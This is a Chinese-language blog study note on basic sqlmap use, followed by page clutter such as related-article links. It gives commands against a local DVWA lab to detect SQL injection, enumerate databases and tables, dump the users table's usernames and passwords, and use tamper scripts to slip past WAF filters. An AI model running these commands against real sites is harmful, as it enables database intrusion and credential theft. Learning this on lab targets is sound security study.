信安学习day14:sqlmap的基础使用

最新推荐文章于 2024-05-31 09:42:54 发布
最新推荐文章于 2024-05-31 09:42:54 发布
阅读量64 收藏
点赞数
文章标签: 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73760178/article/details/132330920
版权

什么是sqlmap:

是一个开源的渗透工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限,它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。

[工具使用]SqlMap_拈花倾城的博客-CSDN博客——全手册

标准格式:        Python sqlmap.py -X xxx.txt --risk 3 --level 3——万能的命令

1.判断是否有SQL注入

-u                                                                                                    对于GET请求

 python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"

2.跑数据库 --dbs

3.-D 数据库名--tables 跑出指定数据库的表

 python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" -D dvwa --tables

4.跑数据库列   -D 表名 -T 指定列 --columns

 python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" -D dvwa -T users --columns

5.跑出列中内容

 python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" -D dvwa -T users -C user,password --dump

常用函数:

 

对于POST请求,

 

将POST的包保存下来,将文件放到sqlmap文件里

Python Sqlmap.py -r xxx.txt

Sqlmap tamper:
使用sqlmap提供tamper脚本,在一定程度上避开过滤,绕过WAF(防火墙)规则的阻挡,进而渗透攻击。

使用tamper让自己的select变为seleselectct——自己定制规则。

 

 

yiqiqukanhaiba
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
一些不错的网页
墨鱼菜鸡
12-06 2251
http://www.zhengdazhi.com/archives/1749 书签栏 息收集 二级域名查询,子域名查询-站长帮手网 ZoomEye - Cyberspace Search Engine 360威胁情报中心 SSL证书在线检测工具-中国数字证书CHINASSL ...
SQLMAP使用笔记.pdf
01-25
SQLMAP使用笔记
学习day15:SQL注入——布尔盲注,延时注入及堆叠注入
weixin_73760178的博客
08-17 73
盲注:不会给回显,只能感觉到页面有一定的变化。会出现一定的差异(页面的运行时间和页面大小)堆叠注入:拥有很高的权限可以对数据库进行更改。sql语句特性:通过分号隔开能分开出很多语句。
学习day3:SQL注入
weixin_73760178的博客
08-03 69
在输入字符串中注入SQL指令,在设计不良的程序中忽略了字符检查,则这些注入进去的恶意指令就会被数据库服务器误认为是正常SQL指令而运行。这里跟昨天的命令执行漏洞有点像,都是利用开发程序人未对输入语句进行检查和判断,只不过SQL注入会更针对于数据库服务器。
黑客学习路线
a720561252803的博客
05-21 9032
转载 :https://www.cnblogs.com/HackKen/p/7732515.html 引:在任何时候,我都是孤独的。 最近在群里也有人问过我,我是如何学习黑客和渗透测试的,在这里,我就把我的学习路线写一下,让新手和小白们不再迷茫,少走弯路,拒绝时间和金钱上的浪费! 第一周:入门 在学习的时候,你起码需要对常见的黑客术语需要掌握,了解术语的话可以去看看这里的百度文库,写的还是可...
那些年走过最深的路,面试的套路
weixin_30496431的博客
08-02 370
前言 致全行业从业者,唬得住面试官50K,唬不住5K。 公司一个银行外包项目,通知我明天跨省去面试,低调混了这么久,正好拿出时间分享下一些常规经验吧。 第一步:岗位需求 一般我们平时看到的招聘需求都是直接复制粘贴的,面试官说不定都没仔细看过,甚至是某些HR从乱七八糟的网页上贴上直接骗人来公司面试给他增加绩效的。 比如下图中的要求: 我画圈圈的这句话,JAVA程序,然后后面给了一堆PHP程序的例子...
代码审计系列篇一之代码审计学习思路
weixin_43733912的博客
11-03 502
学习代码审计要熟悉三种技术,分四部分走 一:编程语言 1:前端语言 html/javascript/dom元素使用 主要是为了挖掘xss漏洞 jquery 主要写一些涉及到CSRF脚本使用的或者DOM型XSS,JSON劫持等 2:后端语言 基础语法要知道例如 变量类型,常量,数组(python 是列表,元组,字典),对象,类的调用,引用等, MVC设计模式要清楚,因为大部分目标程序都是基于MVC写的,包括不限于php,python,java。不用会写,但是一定能看懂,而且要看懂逻辑,知道哪些功能点...
我的黑客和渗透测试学习路线
weixin_30632089的博客
10-25 1632
  引:在任何时候,我都是孤独的。    最近在群里也有人问过我,我是如何学习黑客和渗透测试的,在这里,我就把我的学习路线写一下,让新手和小白们不再迷茫,少走弯路,拒绝时间和金钱上的浪费!            第一周:入门        在学习的时候,你起码需要对常见的黑客术语需要掌握,了解术语的话可以去看看这里的百度文库,写的还是可以,对大多数的黑客术语都有过渡,而且对计...
面试总结-2023届全面试题总汇
lza20001103的博客
09-16 6388
2023届全面试题总汇 文章目录2023届全面试题总汇前言0x01 秋招目录(随时更新)0x02 各大全厂商面试题资料链接一个2023届毕业生在毕业前持续更新、收集的全岗面试题及面试经验分享 前言 最近发现一个宝贵的面试文章,写了各个以分全为业务的公司汇总,也是面试官经常会问到的问题,以及CTF经历也是面试官所看好的,大家平时要多多打打CTF和靶机实战呀,这样我们的实战能力才会所有提高。 0x01 秋招目录(随时更新) 有最新的公司校招息可以随时发布,第一时间更新主要全行业的公司,主要放不以
计算机专业如何做到毕业≠失业?
ewii12567的博客
05-29 907
大部分互联网大厂的学历界定基本都要求在本科以上,所以在很多人的印象中,本科学历就是大厂的敲门砖。于是大大小小的培训机构广告出来了,不管是抖音还是视频号,都开始宣传自考本科,这确实是一个提升学历的好机会。然而,随着近几年来互联网的发展,学历的影响正在逐渐地变弱,非本科统招月薪超过10K的并不少见,但是还是有很多小伙伴们有着学历焦虑。“大专学历可以来学网络全吗?“本科学历通过培训班转行网络全还是考研?“大厂是不是只招收本科学历?其实学历焦虑不仅是存在于个体当中,而是正在成为社会整体层面上的集体困扰。
Web应用全:Sqlmap操作参数介绍.pptx
06-19
Sqlmap操作参数介绍 1 Sqlmap简介 2 Sqlmap装 3 Sqlmap操作参数介绍 目录 Sqlmap简介 Sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。 它拥有非常强大的检测引擎、...
Web应用全:Sqlmap用法介绍.pptx
06-20
Sqlmap用法介绍 搭建phpStudy站点 搭建DVWA 2. Sqlmap SQL注入演示 搭建phpStudy phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer,一次性装,无须配置即可...
SqlMap_BurpSuite:SqlMap_BurpSuite
03-10
SqlMap_BurpSuite编译好的sqlmap.jargrep -r“发送到Sqlmap” src/burp/SnifferContextMenuFactory.java: JMenuItem jMenuItem = new JMenuItem("send to ... 使用Burp,Sqlmap进行自动化批量SQL注入渗透测试参考链接
Web应用全:Sqlmap用法介绍(实验).docx
06-20
熟悉Sqlmap工具的使用; 掌握SQL注入的相关知识; 熟悉Web站点的搭建。 二、实验内容 Sqlmap; 搭建phpStudy站点并开启apache服务器和MySQL数据库; 在Apache上搭建DVWA站点; 使用Sqlmap工具对DVWA站点进行SQL...
强化学习——学习笔记3
qq_52302919的博客
05-29 1317
先上图:在上述流程图中所说的Q表即为下表:假设我们在玩一个小游戏,该游戏有上下左右不同的动作,同时也会有不同的状态,比如游戏结束等。Q表也可以称为状态-价值函数QsaQ(s,a)Qsa:这个表格的每一行代表每个 state上述例子中的游戏结束等,每一列代表每个 action上述例子中的上下左右,表格的数值就是在各个 state 下采取各个 action 时能够获得的最大的未来期望奖励。
学习整理 docker
最新发布
wonder_dog的博客
05-31 112
nexus。
书籍学习|基于SprinBoot+vue的书籍学习平台(源码+数据库+文档)
JIngJaneIL的博客
05-28 1086
首先,论文一开始便是清楚的论述了平台的研究内容。其次,剖析平台需求分析,弄明白“做什么”,分析包括业务分析和业务流程的分析以及用例分析,更进一步明确平台的需求。然后在明白了平台的需求基础上需要进一步地设计平台,主要包罗软件架构模式、整体功能模块、数据库设计。本项目软件架构选择B/S模式和java技术,总体功能模块运用自顶向下的分层思想。再然后就是实现平台并进行代码编写实现功能。论文的最后章节总结一下自己完成本论文和开发本项目的心得和总结。通过书籍学习平台将会使书籍学习各个方面的工作效率带来实质性的提升。
前端技术入门学习:探索数字世界的奇幻之旅
qwertyhn_0024的博客
05-27 211
HTML定义了网页的结构和内容,CSS负责样式和布局,而JavaScript则实现了网页的交互功能。对于初学者来说,前端技术既是一个充满魅力的新世界,也是一个充满挑战与困惑的领域。本文将引导您从四个方面、五个方面、六个方面和七个方面深入理解前端技术,开启您的学习之旅。在这个过程中,我们需要不断探索、学习和实践,才能逐步掌握这门技艺的精髓。同时,我们也需要保持敏锐的洞察力和开放的心态,不断适应和应对前端技术领域的变化和发展。同时,随着人工智能、大数据等新技术的不断涌现,前端技术也将面临更多的挑战和机遇。
pdf:sqlmap使用手册
07-04
通过学习这个手册,您将能够使用sqlmap快速、准确地发现和利用Web应用程序中的SQL注入漏洞。希望这个文档对您有所帮助,祝您使用sqlmap进行全测试工作顺利。 ### 回答3: sqlmap是一款用于自动化SQL注入的工具,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值